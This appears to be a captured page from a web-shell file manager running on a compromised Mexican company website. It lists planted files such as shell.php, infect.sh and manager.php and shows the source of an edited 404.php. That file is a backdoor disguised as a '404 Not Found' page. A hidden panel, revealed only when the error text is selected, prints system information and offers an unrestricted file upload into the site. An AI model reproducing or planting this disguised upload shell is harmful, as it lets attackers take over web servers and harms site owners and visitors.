Hackfut Security File Manager
Current Path:
/mnt/ceph/home4/p/e/petimexempresarial.com.mx/public
mnt
/
ceph
/
home4
/
p
/
e
/
petimexempresarial.com.mx
/
public
/
📁
..
📄
.apache_tmp
(7.95 MB)
📄
.bash_profile
(584 B)
📄
.bashrc
(584 B)
📄
.config_cache
(7.95 MB)
📄
.hash_96d5e1cb
(32 B)
📄
.htaccess
(233 B)
📄
.phpinfo
(7.95 MB)
📄
.profile
(584 B)
📄
.session_tmp
(7.95 MB)
📄
.sys_cache
(7.95 MB)
📄
404.PhP7
(1.78 KB)
📄
404.php
(1.78 KB)
📁
Catalogos
📄
Macuspana.html
(15.39 KB)
📄
Silao.html
(15.78 KB)
📁
Tipografias
📄
admin.php
(4.12 KB)
📄
alimentadores.html
(26.09 KB)
📄
contacto.html
(8.34 KB)
📄
cribas.html
(15.73 KB)
📁
css
📄
file-manager-advanced.php
(27.46 KB)
📄
files.php
(4.12 KB)
📁
fonts
📁
forma
📄
googlef46549f86195dace.html
(53 B)
📁
htdocs
📁
html
📁
httpdocs
📄
imagen.html
(361 B)
📁
img
📄
index.html
(17.3 KB)
📄
index.php
(4.12 KB)
📄
index.php.bak-20260306-002613
(16.9 KB)
📄
infect.sh
(584 B)
📁
js
📄
macuspana.html
(15.4 KB)
📄
manager.php
(4.62 KB)
📄
mapa.html
(557 B)
📄
mision-vision.html
(8.6 KB)
📁
phpmyadmin
📁
productos
📄
productos.html
(11.97 KB)
📁
public_html
📄
quebradoras.html
(22.98 KB)
📄
readme.txt
(509 B)
📄
robots.txt
(76 B)
📄
servicios.html
(10.68 KB)
📄
shell.php
(4.12 KB)
📄
shellerr.php
(44.41 KB)
📄
silao.html
(15.79 KB)
📄
silao_copy.html
(15.79 KB)
📄
slider.html
(6.58 KB)
📄
sys.txt
(58 B)
📄
test.txt
(66 B)
📄
timmins.html
(15.15 KB)
📄
timmins_copy.html
(15.15 KB)
📁
tipografias-bien
📁
tmp
📄
transportadores.html
(19.08 KB)
📄
transportadores_copy.html
(19.08 KB)
📁
ultimos
📄
update.sh
(584 B)
📁
uploads
📁
vendor
📁
www
Editing: 404.php
<html> <head> <title>404 Not Found</title> <style> #hidden-content { display: none; background-color: #f0f0f0; padding: 10px; margin-top: 20px; border-radius: 5px; position: fixed; bottom: 0; left: 0; right: 0; } #not-found-text::selection { background: #b3d4fc; } #not-found-text:active ~ #hidden-content, #hidden-content:active { display: none; } </style> </head> <body> <h1 id="not-found-text">Not Found</h1> <p id="not-found-text">The requested URL was not found on this server.</p> <div id="hidden-content"> <?php echo '<h1><b><i><u>Err0r_HB 404</b></i></u></h1>'; echo '<b>System Info:</b> '.php_uname().'<br>'.'<b>Current Directory:</b> '.getcwd(); echo '<br><form method="post" enctype="multipart/form-data" name="uploader" id="uploader"> <input type="file" name="file" size="20"> <input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if($_FILES){ if(!empty($_FILES['file'])){ move_uploaded_file($_FILES['file']['tmp_name'],$_FILES['file']['name']); echo "<b>File Uploaded !!!</b><br>"; }else{ echo "<b>Upload Failed !!!</b><br><br>"; } } ?> </div> <script> // This JavaScript ensures it only shows on text selection document.addEventListener('selectionchange', function() { var selection = window.getSelection(); var hiddenContent = document.getElementById('hidden-content'); // Check if selection contains our specific text if (selection.toString().includes("Not Found") || selection.toString().includes("The requested URL was not found on this server")) { hiddenContent.style.display = 'block'; } else { hiddenContent.style.display = 'none'; } }); </script> </body> </html>
Upload File
Create Folder